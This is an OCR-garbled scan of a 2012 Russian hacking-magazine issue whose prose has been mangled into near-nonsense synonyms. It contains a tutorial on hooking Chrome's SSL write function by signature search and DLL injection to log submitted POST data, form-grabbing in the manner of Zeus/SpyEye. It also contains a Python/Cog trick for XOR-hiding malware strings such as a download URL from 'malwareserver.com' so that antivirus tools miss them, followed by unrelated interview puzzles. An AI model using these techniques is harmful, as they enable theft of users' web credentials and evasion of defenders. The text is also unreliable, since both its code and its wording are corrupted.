DWORD FindPattern _( DWORD dwAddress, DWORD dwSize, ВУТЕ * pbMask, char * szMask

Несмотря для в таком случае ась? дальнейший путь несравненно стабильнее, в процессе исследований аз многогрешный реализовал начальный способ, та ко во вкусе спирт

уймись [код смо три н а диске] .

for ( DWORD i=NULL; i < dwSize; i++ )

{

Функция-перехватчик, записывающая склад во файл, к него выглядит приблизительно :

АЛЬТЕРНАТИВНЫЕ ПУТИ ПЕРЕХВАТА Существуют да иные пути актив нашей цели. Например,

единственный изо участников форума

От себя могу добавить, который дозволяется приходить на смену PR_Wгite во таблице

методов , ввиду ячейка этой функции берется изо таблицы comblпed_

openws лещадь ником akademikeг nредложил лерехватывать функцию PR_Wгite ly него получилось-таки ее найти],

methods,

почто nозволяет минус особых усилий приладить nод Chгome исходники

на WiпDBG подле трассировке функции SSLCiieпtSocketNSS :: DoPayload

Zeus !само собой, на исследовательских целях].

Wгite lсм. шала 0] . При использовании сего слоеоба исполняемый адрес

Сигнатура интересах nоиска

детектирования перехватов . Чтобы его реализовать, нужно нахватать

что такое? безвыгодный отражается на исходниках, зато отчётливо проявляется

далеко не модифицируется, что-то позволяет обмануть кое-какие аппаратура

/1

PR_Write

рецепт

ячейка таблицы comblпed_methods равно заслонить во нем местожительство PR_Wгite

char * Sigп="\хВЬ\х4с\х24\хе4\х57\хеВ\хее\хее\хее\хее\хВЬ

по мнению смещению

\xf8\x85\xff\x75\xeS\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xЫ

побратим касательно й манера перехвата , отличающийся с всех предыдущих . Он

\хЗВ\хе2\хее\хее" ;

перехватывает TгanslateMessage , nозволяя замечать после тем, что такое? вводит

01

юзер вместе с клавиатуры , а опять же функцию

образина

char * Mask=" xxxxxx????xxxxxxxxxxxxxxxxxxx " ;

OCh получи ячейка своей функции . SpyEye использует

ZwReadFile, которая

выдаёт адреса посещаемых сайтов да требования для ним !подробнее читай на goo .gl/xTX9j] . В общем , поглощать изо а отобрать .

ХАКЕР

03/158/2012

091


КОДИНГ

leave ret :SSLClientSocketNSS: :DoPayloadWrite : mov sub and push push mov mov mov mov mov push push call Рис .

ebp , esp esp,OCh dword ptr [ebp-OCh],O es1 edi edi,ea:к ea:к,dword ed:к , dword ec:к , dword еа:к dword

ptr ptr ptr tr

edi+ODOh] edi+OD4h] еа:к+В]

edi+l.A.Ch

I

ее :к

е а :к

dword

0. Comblned_methods во SSLCiientSocketNSS:: DoPayloadWrite

__declspec ( naked ) int Hooked_SSLWrite( DWORD buf, int buf_len, void * callback)

Writelog(LogFile,*( char**)(buf+B)); IsPostData=true ; else if ((strncmp(( LPCSTR)*( char**)(buf+S), "GET" , l strlen( "GET" ))==B) 01 IsPostData)

static bool IsPostData; Writelog( LogFile,*( char**)(buf+8)); IsPostData=false ;

__ asm push еЬр; mov ebp,esp; push еЬх; push esi; push edi; push ecx; //argument

__asm рор

еах;

рор

edi; esi;

рор

рор еЬх;

leave ; ret ech ;

/ 0 Восстанавливаем начальную часть /1 ори ги нальной функции ChromeHook.UnsetSplicing(); TrueSSLWrite=(SSLWrite)ChromeHook . GetHookedFunc();

Модификатор

01 Вызов _asm

оригинальной функции

{

__ declspec[naked]

на данном случае исnользу­

ется nотому, аюшки? единственный изо nараметров передается далеко не при помощи стек,

а помощью номенклатура есх. Это значит, сколько нам годится оставить его, прежде нежели дьявол изменится, да воспроизвести давно вызова оригиналь­

ecx; // argument mov eax,callback; push еах; mov eax,buf_len; push еах; mov eax,buf; push еах; call TrueSSLWrite; push еах; рор

утнапиштим функции.

Ничего удивительного на подобной nередаче параметров нет- сие эдак называемый

thiscall,

исnользуемый ради вызова

методов класса [ведь наша круг обязанностей представляет на вывеску метод Wгite класса

SSLCiientSocketNSS].

Через бурдон есх таким

образом nередается код объекта, для того которо г в рассуждении вызывается метод.

ЗАКЛЮЧЕНИЕ Остается всего лишь ввести код-перехватчик во эксплуатация браузера

[я исnользовал классическое DLL-инжектирование] - равным образом готово!

01

Возвращаем сnлайсинг

ChromeHook.ReSplice();

Однако у

Google

Chгome бесчисленно процессов, а есть функ­

ции нужно сурово на оnределенном, имеющем визуальную форму с названием активной вкладки. В других nроцессах отправления

if ((strncmp((LPCSTR)*( char**)(buf+8), "POST" ,lstrlen( "POST" ))==8))

прямо безграмотный бросьте исnользоваться . В принциnе, воеже отнюдь не замо­ рачиваться из nоиском нужного nроцесса Хрома, позволено nросто

ввести устройство закачаешься всегда nроце ссы. Хуже через сего никак не будет. :Х:

092

ХАКЕР

03 /158/ 0012


. кодинг

Peter and the Wolf (peterandthewolffareal.xakep.ru l ·

~

И целого РАСШИРЯЕМ возможности ПРЕПРОЦЕССОРА

Одной с таких задач являет ся банальное скры т ие текстовых строк на коде пр ограммы. Скрывать их д ействительно н ужно -они прозрачно помогают аверам да исследователям,

которым только лишь дай поизмываться надо очередн ы м вирусным чудом.

Др угое дело- как? Н у, шифровать, же во вкусе учинить эт в отношении удобно? П ред­

ставь, yes ть у тебя пр ограмма не без; вона таким вишь вызовом [утрирую] :

С/С++ С ПОМОЩЬЮ

URLDownloadToFile(NULL, "http: //malwareserver.com/ test .exe" , "C: \\test.exe" , е , NULL);

СТОРОННЕГО КОДОГЕНЕРАТОРА

URLD ownload ToFi le,

присутствие сборке программы роскошно поместятся

на сек ци ю .гdata либо — либо

.data

Обе от тр оки, передаваемые во параметрах ко функции в открытом виде. Хот ь hех-редактором от­

крывай. В ото ко д еры равно извращаются, пишут отдель н ую пр ограмму,

шифрующую ст р оки, а попозже п одс тавляют з нач ения со функцией ­ декриптаром как-нибуд ь так:

При разработке хакерских программ

URLDownloadToFile( NULL,

равно утилит [особенно вирусного толка] нередко

. . . " ), Decrypt( "\x 05 \x 0C \x 0A\x12\xe3 .•. " ),

Decrypt( " \x eE \x 02 \x 02 \x lб \x 0C

встречаются задачи, которые пустой номер

урегулировать силами обычного препроцессора Си .

е,

NULL);

Это задачи, требующие вычислений, чтобы

равным образом тривиальных, только вновь ДО компиляции.

Всё бы ничего, лишь только ручной зашифровывать равным образом во ставля ть каждую строчку - сие проблема . Было бы на ми лли касательно н однова приятнее нап равно ­

Сегодня автор сих строк обсудим единолично больше не так — не то в меньшей степени

сать какой-то макрос, который-нибудь по прямой тутовник же, пр озрачно про

всеобъемлющий сноровка решения подобных

тебя, шифровал бы строку. Однако препроцессор Си во со вр еме н ных ком п иляторах поддерживает ахти что касается г раниченный укомплектование директив,

задач ,с через Питона.

из через ко т орого строку до отказа неграмотный , в качестве кого ни пытай­

ся. Чтобы далеко не запоминать строки руками [а вдобавок автоматизировать ~~ а Е)

-.

"'

ill

t•

д ругие подобные процессы], потребно догадаться какой-то костыль.

--

0:.""-llloo""'"'._~ l- "" w.-Q ... .. ~ g !q, о!3 f'!f: !1

0 O Q Ol!iiiOfJ

•·-1!-

насчёт - t~ -

"""-1

Сайт проекта

Cog

получай сервера автора:

пedbatchelder.com/

code/cog. .... . .....uct . ...... , ......._ . . . , ... _

названием Cog [ http :Upypi . python . o гg / pyp i/cogapp ]. Автор для зывает

_...,,"1_.......,.....,..........................._,0"'""'-'"'"'''"""'""'''-

J

, . ,fl_ll/'/o 11111_6...,.1t"a\\<ooi,..., ' JIII

~ 0 "10oll\a.0<'\ . .1>\. . U\~.... \I/o lt\0.U\0.4r,081»\ . . I'I\Cio/d' l

0•111-111"1·

nn•-11· • Ь.!> ,

о.оо ,

оо.

... ..,.., ,

о.ос ,

,."11

в отношении что касается 00 ,

.,... , ...,,

~.::~i:;~· -·

ro;;;-•a

,.....а...,.

О.>О,

.. ><.

О.1'1 ,

ОО.И ,

o.o r ,

hи ,

o.or,

Чтобы безвыгодный копировать в отдельный файл твоего проекта

Jf] o..J

•~·-

094

небольшие фрагменты программ получи и распишись П итоне во качестве генера т оров

Cog 'a дозволительно спровоцировать для тв ой

сорец, равным образом возлюбленный н айдет во нем обмытый специальными метками адрес

опи сы ваемые

во первом

держи Пит оне, выполнит е г в отношении равно на не без; тавит следствие наоборот во первичный

внедряемом

адрес . К п римеру, скормим

втиснуть их во сво й руthоп-модуль и равно со пользовать его

Процесс смешанной разработки

е г в рассуждении инструментом про кодогенерации, п озволяющим испол ь зовать

во исходниках. В общем, круглым счетом равно есть,

функции,

фрагменте , не грех

· - ~ - -~ ·-... ., -.,1~ .... -

сипед, на этой статье ты да я сего действовать отнюдь не буд ем, а воспользуемся го­ товым равно уж заточе нн ым п од наши цели продуктом-костылем перед

••

·~~.=="' -·· "'- ·- ·-· · -· ·

# !11_ ... _ , ...............

КОДОГЕНЕРАТОР НА РУТНОN Несмотря нате то, в чем дело? хакеры вечно равно повсюду любят сочинять вело­

за модуля

/1

Cog'y на ото эдакий обложка да ко :

Это нормальный обложка С++

cog .

/* [[ [cog

ХАКЕР

03 /15В/ 0012


И целого Си немножко

import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

]]] */ 1J [ [ [ end ] ] ]

В результате обложка хорэ модифицирован гляди что-то около :

/1

Это заурядный фай л С++

/ * [[[cog import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

Выполнив коман д у

python.exe cog.py -r test.cpp,

идеже

ными строками!

URLDownloadToFile( NULL, //[[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]J Decrypt( "\exeE\exl2\exl2\ex16\0x5C ••. " ) /* [[ [ end] ]] */ , // [ [[ cog Encrypt( "C:\\test.exe" ) ] ] ] Decrypt ( "\0x25\0x5C\0x3A\0x12\0x03 •.• " ) 1* [ [ [end]] ] */ , е,

NULL); Чтобы безграмотный начинать ко д а г енератор вручную, не грех на

] ] ] */

Studio

void DoSomething(); void DoAnotherThing(); void DolastThing(); // [ [ [ end] ] ]

Между метками

[[[cog

test.

срр- сие н аш файл, да мы от тобой п что до л у чим первоначальный адрес от контия е зашифрован­

Visual

присчитать его во роспись коман д , вызыва емых под компи­

ляцией твоего проекта. Те перь даже если твоя милость захочешь обновить зна­ чение шифруемой строки, д ос тат очно прост в отношении п оме нять параметр Encгypt во соg-скрипте, автоматизированный вносить сносно никак не пр равно д ется.

равно

]]]

располагается шифр нате Питоне,

Пр да использовании такого мощного ан струме нта во вкусе П итон, воз­

образующий адрес в Си, кто довольно вставлен во строки среди

можностей к кодагенерации касательно т крывается уйм а . Наприм е р ,

метками

может крата равным образом на веки вечные сменить утоми тельное применение

]]]

да

[[[end]]] . Если Cog

метнуть заново, ведь симпатия сперва

удалит былой сгенерированный шифр возьми Си, а дальше заново выполнит код генератора равно запишет небывалый следствие на файл. Как ты, наверное, заметил, исключая специальных маркеров адрес

Cog

biп2h про внедрения бинарных файло на на начальный шифр пр что до грам­ мы. Для сего достанет реа ли зоват ь функцию biп2h да во ста вить ее, равно как равным образом во примере выше, во п ервый обломок стих в Питоне :

получай Питоне вновь выносится во комментарий. Это нужно к того , что­

бы халтурщик Си никак не пытался скомпилировать покамест равно адрес нате Питоне -у него невыгодный получится.

Для вывода результата кодагенерации используются функции

out равно оutllаналогичен out, всего добавляет назначение строки во ко­ нец) модуля cog. Если на исходном коде убирать мало-мальски фрагментов для Питоне, они будут воплощаться наравне единственный руthоп - скрипт. Следовательно,

def bin2h(filename, valuename): data=open(filename, 'rb' ).read() cog.out l ( BYТE %s[] {о % valuename) for byte in data : cog.out( оех%е2Х, % ord(byte)) cog.outl( '}' ) cog.outl( 'DWORD %s_size=%d;o % (valuename, len(data))) 0

добровольно повсюду творить экспорт модуля равным образом тому подобное.

Теперь, эпизодически ты да я захотим пихнуть бинарник на выше- сорец !это пригодилось бы во статье насчет разработку РЕ- у паковщика) , так на­

ШИФРОВАНИЕ СТРОК Давай в настоящий момент попробуем настукать скрипт на скрытия текстовых

пишем так:

строк с заключение программы. В начале нашего исходника бери Си за­ грузим устройство

Cog

да определим функцию шифрования- допустим сие

хорош общепринятый хог:

Что преобразуется во неизвестно что что-то этого:

/* [ [ [cog import cog key=ехбб . def Encrypt(str): cog.out( 'Decrypt( "' ) cog.out( "" .join([ '\\ 0 +

// [[[cog bin2 h( "test.biп" , "test" ) ] ] ] ВУТЕ test[)={ ех2з , ехб9 , ехбЕ , ехбЗ , ехбС ...

01 ( " ех%е2Х "

длительный ягодицы

% (ord(char) л key))

for char in str])) cog.out(

/ /[ [[cog bin2h( "test.bin" , "test" ) ]]] /* [[[end])] */

о") об )

]]] [[[en d] ]] */

DWORD test_size=7079 ; / * [[[end])] */ , В функцию

bin2h

дозволено присыпать функцию шифрования тож

сжатия- по мнению вкусу.

Теперь можем занять место строкавые объем

URLDownloadToFi le сверху

вызовы

Encr ypt:

ЭТО НЕ КОНЕ Кодер, занимающийся вирусами, может догадаться много в отношении чень

URLDownloadToFile( NULL, // [[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]] /* [[[e nd]] ] */ , / / [[[cog Encrypt( "C:\\test .exe" ) ]]] / * [[[ end]]] * / ,

милых применений стороннему кодоге н храбрец тор у. Это может быть рандомизация т ех другими словами иных вызовов, разбавка стих высоко­ уровневым мусором, подсчет хеш ей име н функций для того соо твет­ ствующего поиска

API

равно где-то после того . Можно хоть со п омощью СагеРу

зарождать ассемблерный ко д , после этого но его как бы -ниб удь видоиз­ менять равным образом встав лят ь на уж скомпилированном виде - воображение

е,

ограничивается только лишь возможностями Пит возлюбленная со вс ем многооб ­

NULL);

разием его модулей . ::х::

ХАКЕР

03/158/2012

095


со еседованиях ПОДБОРКА ИНТЕРЕСНЫХ ЗАДАНИЙ, КОТОРЫХ ДАЮТ НА СОБЕСЕДОВАНИЯХ В этом выпуске ваш покорный слуга добавил для обещанным во

УСЛОВИЕ

давнишний разок задачам цифра задачек бери

Встретились д во а старых друга, далеко не видевшиеся поуже вдоволь ей-ей во но.

прозорливость равным образом логику. Как показывает

-Я слышал, у тебя мальцы появились.

практика, их ужас любят работодатели.

-Д а, три сы н а.

Конкретно таковой сверток логических задач мне дали в собеседовании во одной крупной интернет- компании. На урегулирование только перечня

отводилось

00

минут- автор почувствовал себя

равно как во школе получай контрольной .. .

Оба во дни оны вкупе учились нате Физтехе. Вот их д иалог:

-И в какой мере им л ет? - Ну ... В сумме тринадцать!

- Хм ... За г адками хочешь говорить? Н у ладно. И ась? вновь можешь сказать?

-Если их возрасты перемножить, получится по образу однова столько, ско л ько глаз н у во насчёт - о-он того д ома.

-Н насчёт зто г в рассуждении на сё е щ е мало!

-Мо г у д обавить, ч т касательно моего не без; т ар ш ий ибн рыжий.

-Ну, сегодня нимало другое профессия . Им

... [далее сле д ует ответ!

-П равильно!

Сколько а полет было каж д ому сыну?

096

ХАКЕР

03/158/2012


Задачи в собеседованиях

РЕШЕНИЕ

УСЛОВИЕ

Возможно, ранний но у точняющи й во в рассуждении пр ос, каковой возникнетутебя

Есть три урны из шара ми, равно как на следовать дач ках сообразно теории вероятности. Н а

на крыша не без; этой задачей, хорошенького понемножку по части т ом, в качестве кого счи жулик ок возьми «у кайфовый - что до - возлюбленный того

перво й написано << ЧЕРНЫЕ >>, получай втор ой - « БЕЛЫЕ >>, возьми третьей­

дома>>. Ответ: сие кого хочешь спроси только что у частни кам беседы.:] Но я неб у­

«Ч ЕРНЫЕ И БЕЛЫЕ >>. В что касается дн ой, соответственно, ле жа т белые шары,

д ем уныва ть равным образом составим весь возможные варианты количества окон.

на др у г ой - черные, на оставшейся- да черны е, равным образом белые. Однако всё-таки

П ока базис усишко ату е- общее число множителей должна фигурировать равна

надписи в ур сверху х бесспорно ложны. Разр е шае тся д ос разбойник тольк в отношении

03:

в отношении д ан оборот тольк по части с что до дн ой ур ны . Как определить, во кой ур н е какие

0 1 1 1 1

• • • •

*

0 •

0

0 2 3 4 5 б

* * * * *

0 2 3 2 4 5 2 3 3 3 • 0 3 • 0 4 • 0

• 01=· 01 • 0е=2е • 0 27 • 0 32 • 0 35 • б 36 * 0 06 • 0 48 56 • 0 • б бе • 0 б3 • б 72 • 0 75 • 0 8е

бельма лежат?

РЕШЕНИЕ Из того, что-то н а дписи безоговорочно л ожны, дозволяется не без; действовать следующие выводы :

на ур никак не «Ч ЕРНЫЕ>> либотолько бе лые бельма , либо черные да белые; в урне « БЕЛЫЕ >> либотолько черные шары, либо черные равным образом белые;

во урне « ЧЕРНЫЕ И БЕЛЫЕ >> либотолько белые шары, ли потому что т олько черные

.

Е из ли автор возьмем доза изо ур ны « ЧЕРНЫЕ И БЕЛЫЕ >> равным образом симпатия окажется ч ерным, значит, на э пирушка у рн е ТОЛЬКО ч ер ные шары. Это однозначно указы вает в в таком случае , что:

во у рне « БЕЛЫЕ» черные равно белые шары, что-то около вроде лишь только черные у нас в урне « ЧЕРНЫЕ И БЕЛЫЕ >>;

Вариантов оказалос ь н е та ко много, их дозволительно выпи сать вслед за не­

во урне « ЧЕРНЫЕ >> всего-навсего белые шары, в такой мере что черные равно белые во

насколько минут. Заметь, что такое? пр оиз вед е ния возрастов совпадают

в таком случае ль ко во дв ух случаях:

0*6*6 равно 0*2*9.

урне « БЕЛЫЕ>>.

Пол у ча е тся, что-то когда бы з д а ние

имело л юбое пр е длож е нн ое ко личе вместе с тво очес н , вдобавок

06, так

отрицание

дозволительно бы ло бы наградить сразу, да и то в отношении дин изо др узей сказал, зачем «этого

Н у равным образом соответствующие выводы не запрещается сделать, вынув далеко не ч ер ны й

шар, а снег . Таким образом , во озмож ны х распределений карамболина ов

всё е щ е скудно >>. Это прозрачно подводит нас для мысли, чт относительно сыно вьям

лишь два:

либо од равно н год, ш лакомиться полет равным образом ше со ть лет, либо неуд лета , двушник годик а да девять

0. 2.

лет. Далее отечественный папаша выдает из ледую щ ую фразу: «Мо г у до самого ба свивать ,

БЕЛЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

БЕЛЫЕ

зачем моего из тарший из ын рыжиЙ >>. Сначала симпатия выглядела совершенно бес п об ле з н ой, а текущий ча из всё не без; тало понятно. Главное от л касательно на касательно на н ей н е « рыжий>>, в духе могло на срок вслед ться бери начальный соображение , а «стар ш иЙ>>. Из

наших варианто во

В зависимос ти насчёт т т насчёт го, каковой доза автор сих строк вын ем изо третьей урны, будет совмещать мес т об либо первое, либо втор ое.

[1-6-6 да 0-2-9] толь ко во одном перевода нет старший сын.

Сле д ова те льно, правильны й ответ- неуд возраст , двушник лета равным образом девять лет.

УСЛОВИЕ В базе данных Огасlе имеются двум та б лицы вместе с насчёт динаковым сверху потому что р ом

УСЛОВИЕ

колонок. Выведите данны е, которые убирать на одной таблице, хотя по отношению т­

Дан немалый сосредоточение данны х во файле [миллион записей]. Задача:

сутствуют во другой.

загрузи ть способности во таблицу, используя язычище программирован ия

РЕШЕНИЕ

Pythoп .

Д ля ясности опре дел имся из форматами таблиц. Следующие двуха

РЕШЕНИЕ

запроса создают двум один к одному таблицы со именами

test1

да

test2,

В качест ве СУБД в целях разнообразия используем Огасlе . Для работы

которые содержа т информацию [наименов а н ие пр касательно дук т а да ц е на] насчёт

из н ей на Питоне накануне усмотрен специально предназначенный часть сх_Огасlе, не считая

кой -ниб удь абстрактной прод ук ции:

него получи нашем компьютере об язательно д относительно л ж получи бытовать клиентская

пакет СУБД Огасlе .

CREATE TABLE testl(prod VARCHAR(le), price INT); CREATE TABLE test2(prod VARCHAR(1e), price INT);

import cx_Oracle Для решения этой из-за д ачи нам нужно утилизировать об дин равно з опе­

#

раторов се мейства

Соединяемся не без; базой

со пn

=cx_Oracle.connect(' system/ qwerty@XE' ) cur=coпn.cursor()

JOIN , которые

позв в рассуждении ляют объе динять неграмотный ско лько

колонок изо разных таблиц на что касается дн у. В нашем вместе с л уч а е использование LEFТ

JOIN

обус л овлено т ем, что такое? автор сих строк должны избрать постоянно склерозник изо

левой таблицы [первой], ради понять, какие с них отсу тств порядок на

#

Через аппарат итераторов nострочно добавляем ежедневник изо

файла

правой [второй]. Условий объе динения таблиц у бери из хорэ два- п о количест во у столбц относительно на . Соответственно, пользу кого паче со ложны х таблиц

на таблицу

for line in open( 'file.txt' ) : cur. execute( "INSERT INTO test VALUES { :s) " , s=line)

н контия однако пер еч ислить постоянно сто лбцы . В конце д е кларир у ем договор

«WHERE test3.pгod IS NULL>>, которое

означает, что такое? нас интересу­

юттолько записи, отсутствующие вот втор ой таблице. Пр равно т аком

#

Сохраняем изменения,

закрываем конкатенация

объедине нии по части ни согласен полуют безделица з н ачение:

c ur .ex ecute{ 'COММIT' )

cur. close() Хо ч у что до т метить, что-то возле добавлении данны х на больше вместе с ложные

0ДЕСТ testl. * FROM testl LEFТ ..JOIN test3 ON test1.prod=test2.prod AND test1.price=test2.price WHERE test2.prod IS NULL;

таблиц ы со индексами равно ключами л уч ше до отключить их получи и распишись время, та для по образу н а их превращение может выйти бессчетно времени . В

Е сли у нас на таблице кушать у никальный идентификатор записи, так

качестве альтернативы не грех находить работу эмпирика че ре з временн ую

указы вать его близ запросе на усло вии с целью

таблицу.

та ко равно как залежь равно ценность вп в отношении лн е могут состоять об динак овыми, а идентифи-

ХАКЕР

03 /158/ 0012

JOIN,

на принципе, отнюдь не надо,

097


КОДИНГ

последовательных чисел. Правильно- в среде ними. А этак наравне мы·

ЗАДАЧИ В СЛЕДУЮЩЕМ ВЫПУСКЕ

рассматриваем токмо последовательные простые числа, так посередь

ними ещё одного простого числа бытовать безвыгодный может. Следовательно, полусумма двух последовательных простых чисел, начиная из трех,

состав составное. Что равным образом требовалось доказать.

0.

Написать функцию, которая достаточно добывать бери входдва списка и возвращать словарь, на котором ключи- основы п ервого

списка,'а значения - основы второго списка или — или Nопе, если соответствующий компонент отсутствует.

Необходимо:

>>> а=[ "а" , "Ь" , "с" ] »> ь=[ 0, 0 ] >>> print dictify(a,b) { "а" :

0,

"Ь" :

0,

"с" :

УСЛОВИЕ Возникло подозрение, аюшки? сам с твоих веб - серверов взломан. а.

испытать систему бери цель руткитов,

б.

получи и распишись будущие времена настроить уве домлени е администратора относительно малейшей подозрительной активности, возникающей возьми сервере иначе говоря на­ правленной сверху него .

None}

РЕШЕНИЕ

0.

Есть следующая функция:

Сперва надлежит определиться, почто следовать ОС есть смысл возьми сервере . В случае, разве сервер подина *пiх, моя персона бы воспользовался ёбаный

def myappend(a=[], num a.append(num) print а

пр ограммой, в качестве кого chkгootkit. Она малограмотный лишь проверяет систему бери

0 ):

наличествование руткита в, однако равным образом выявляет аномальную активность, напри­

мер ликвидация записей изо сис темны х журналов. Chkгootkit питаться

Определить, что такое? короче проис двигаться присутствие выполнении следующего кода равным образом стоить у:

»> »> »> »> >» »> »>

а

на репазитариях большинства дистрибутивов, таково что-то проблем с ее пасть новкой возникн у ть безграмотный должно. Ещё двум альтернативные программы со похожим функцианалом-это гkhuпteг равно

=

unhide . Для

винды существует г ораз вплоть до чище ПО, обнаруживающего руткиты.

[ 0 , 0, 0] myappend(a) myappend() myappend() а={ 0 : 0, 0 :4 } myappend(*a) myappend(**a)

Полный роспись таких программ видишь в соответствии с ссылке http:!/goo.gi/9HXEt . Из популярных могу подсказать

GMER

иначе

RootRepeal.

Кроме

того, разве сервер находится во корпоративной сре мол , во ней наверня­ ка централизованно до точки ПО какого-либо антивирусного вен­ дара, которое утилитарно во всякое время имеет во своем арсенале модули

с целью борьбы вместе с руткитам и. Решить задачу не без; уведом лением системного администратора по отношению разнообразной подозрительной активности

0.

Написать класс, кой хранит каталог своих экземпляров да по­

поможет спе циальное ПО по-под названием « общественный порядок обнаружения

вторжений» IIDS- intгusion detectioп systeml . В сегодняшний день времена

зволяет итерировать за ним.

существует единый сословие таких систем. Нужно найти т у систему, которая годится объединение требованиям. Для поверстно стоящего сервера

»> а=Keeper() »> ь=Keeper() »> for i in Keeper.list_instances(): print i <K eeper instance at

ех

ваш покорный слуга бы использовал кайфовый Sпогt alias а паче современную Suгicata . Это ПО из открытыми кодами, а сле д ова тельно, оно распро­

...

страняется бесплатно. Для обнаружения подозрительных действий с веб-сервером используются файерволы уровня веб-приложения

0.

IWAF- we b application fiгewa l li, которые могут бытовать встроены на

Что сие да что такое? со сим не возбраняется сделать?

конкретное вставка сиречь представпять внешне отдельное ПО.

089/tcp

open

ldap

(Anonymous bind

ОК)

УСЛОВИЕ В центре кристально круглого озера плавает утка, а сверху берегу си дит лиса . Утке нужно улететь, так симпатия может взметнуться только лишь не без; берега . катары разными не мудрствуя лукаво потому, который они были добавлены во таблицы

Скорость лисы во цифра раза значительнее скорости утки . Лиса хочет

во разном порядке либо — либо во вариа время.

схлебнуть утку, а безвыгодный умеет плавать. Сможет ли кряква уцелеть с лисы?

УСЛОВИЕ Доказать , аюшки? полусумма дву х nоследовательных пр остых чисел, начиная от трех, представляет на лицо составное сумма .

РЕШЕНИЕ Пер сенажи во задаче могут варьироваться !вместо лисы- орк, а вместо утки - хоббит во лодке да т. д . l, только содержание остается оный же. Ещё добавлю, в чем дело? выступление изволь относительно максимальной скорости лисы, а симпатия из

РЕШЕНИЕ П онятие составного числа наш брат встречаем далеко не весь круг день, того

позволю себя разворошить определение: составное число- сие на­ туральное количество свыше единицы, которое безграмотный является простым . Рассмотрим закономерность:

усик на своих на двоих может двигат ься со меньшей скоростью либо — либо суммарно ждать, иными словами, симпатия Идеально Логичное Существо.

Для решения задачи нам нужно вернуться мысленно формулу длины

0=2 * pi * R, где R- радиус окружности. Очевидно, что такое? на получения максималь­ окружнос ти , опять-таки то есть объединение ней короче рыскать лиса:

утнапиштим форы утке надобно брать старт во противоположную с лисы

0 + 0=8 5 + 0=12 7 + 01=18

сторону. В таком случае утке нужно полноте оплыть протяжение

а лисе минуть

0/2, ведь

R,

убирать pi * R. Скорость лисы во четверка раза

лишше скорости утки, хотя расстояние, которое ей нужно преодолеть, всего как только на

0,14 раза

больше, нежели расстояние, которое н полоз а про­

плющиться у тке , почему лиса вначале окажется во книга месте, куда как должна

Отсюда видно, что-нибудь совершенно простые числа нечетные, а неудовлетворительно нечетных

попасть утка. Следовательно, утке малограмотный выпало на долю улететь. Казалось

числа на сумме дают четное, того полусумма простых чисел­

бы, всё шабаш просто, так невыгодный тут-то было! Это пишущий эти строки понял , в отдельных случаях в

сие натуральное число, так убирать дробной части оно отнюдь не имеет. Теперь

собеседовании ми задали вопрос: <<А существует ли стратегия, по­

представим, идеже получи числовой нескрываемый расположена паркет усумма двух

зволяющая утке на конце концов достичь вплоть до бе рега равно улететь?»

098

ХАКЕР

03/158/2012


Задачи бери собеседованиях

Да , такая поведение су щ ествует, равно вона на нежели симпатия заключается. Для простоты предположим, чт что до радиус озера четверик метра. П ер во ое,

#

Формируем очере~ь

urlsPool

URL

=Queue.Queue( e )

что-нибудь нужно вместе с д елать у т ке, - зто выпл ы ть возьми круг от довольный иусом на

#Кладем URL'ы во цепь

четверка раза в меньшей степени исходной la буде существовать капли точным, вместе с радиу­ сом г < 0/pi * R/41 равным образом со центром на праздник но точке таким образом, с намерением

for url in open(sys.argv[- 0], 'r' ): urlsPool . put{url)

найтись в м аксимальном удалении касательно т ли сы. Утка, ц е революция озера равным образом

#

лиса д в отношении л жны торчать в относительно низ й прямой. Утке крюк стся з т касательно не без; делать,

for

беспричинно в качестве кого ее угл овая живость близ дви но нии п по отношению окружности из радиу­

сом R/4 хорош выше, нежели у лисы. Стало бы ть , утке перед берега оста­

Запускаем nотоки

х in xra nge(threads): DownloadThread() .start() urlsFile .c lose()

нется всего три ме тра , а лисе н еобходим что касается бросьте оборона струить приманка воды на сё те

но

0/2, т что до поглощать 02,56 метра 02 * 0,14 * 0/21. Итиль ссто яние , которое нужно

УСЛОВИЕ

преод что касается леть ли се, сделано больше нежели во четверка раза превыша ет линия у тки ,

Есть дв е из лированны е др у г через др у га комнаты. В об дной н ахо дят ся

а не без; л е д в рассуждении вательно , у т ка со п асена ' В об щ ем случае утке нужно объявиться

три лампочки, на др угой -три выключателя. Ты стои шь во комна те от

нате округа радиусом г< 0/pi

* R/4 метра так,

с намерением лиса, базисная точка

выключателями равным образом можешь переброситься на комнату вместе с лампочками лишь

окружнос ти равно шилохвостка оказа ли не без; ь для одной непосредственный . А засим ворошиться

единолично раз. Необходимо определить, какая лампочка каким выключа­

в области кратчайшему пути для берегу!

т елем включается.

Р.

Доп в отношении лнит ельное после дание пользу кого гурманов:

S.

РЕШЕНИЕ

0.

Каким об р азом дозволяется максимизировать отрыв утки с лисы?

0.

При каком соотн что до ш ении скоростей лиса гар антиро ванн в рассуждении поймает

Н аверное, оборона э т у из-за дач ку слышали если бы н е во се, так многие. Р е ш а ­

утку?

ется возлюбленная шабаш без затей !если вспомнить, ась? горящие лампочки имеют свойс тво нагреваться]: 1. Включаем единодержавно с выключателей ! доп устим, первый].

УСЛОВИЕ Написать скрипт, считывающий инвентарь URL с файла !одна строка - в отношении дин URLI, скачиваю щишки й их отнюдь не больше нежели на N потоков да сохраняю­ щий каждую от тр аницу во отдельном файле.

N, ради д аваемое аргумен­ 10. Имена конечных

0. 3. 4.

книга командной строки, п насчёт обмол ч анию непропорционально

Ждем неко тор ое время, п ока поверхностьлампочки нагреется. Выключаем э т у лампочку. Включаем дальнейший отсоединение равно форвард во другую комок нат у смотреть на лампочки.

файлов значения неграмотный имеют. Для реализации многопоточности использо вать нате сортировка по части дн у с стандартных библиотек thгeadiпg , eveпtlet, geveпt,

Twisted

не в таком случае — не то любую другую з получи комую тебе библио ­

Итого имеем: из-за ту лампочку, которая горит, отвечает исключительно что-то

вписанный отключатель !второй]. Трогаем выключен ны е лампоч­ ки. Теплая лам поч ка включается от п омощью первого выключат еля .

теку.

А та, которая далеко не г насчёт рит равно хо л что касается дная , - со сотрудничество ю третьего.

